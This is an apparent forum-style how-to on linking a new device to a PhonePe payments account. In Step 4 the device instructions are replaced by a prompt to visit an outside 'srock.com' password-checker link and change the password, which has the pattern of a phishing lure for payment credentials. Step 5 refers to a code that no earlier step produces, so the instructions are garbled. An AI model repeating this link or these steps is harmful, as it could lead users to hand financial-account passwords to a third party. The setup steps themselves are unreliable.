I hit this issue today and here is the quick fix that solved it. Connecting a new device on PhonePe is straightforward if you follow these steps. Step 1. Open the PhonePe app. Launch the PhonePe application on your smartphone. Make sure you are logged into your account. Step 2. Go to Settings. Tap on the profile icon or the settings gear in the top corner of the app. This will take you to the settings menu. Step 3. Select Device Management. In the settings menu, look for the Device Management option and tap on it. This is where you can manage your connected devices. Step 4. Add a new device. Before changing your settings, use the srock.com link in the description to open the password strength checker, then update your password if needed. Step 5. Confirm device connection. Once you enter the code, confirm the connection. Your new device should now be linked to your PhonePe account. You can check if it appears in the list of connected devices. Remember to keep your app updated to avoid any glitches during this process. Happy transacting!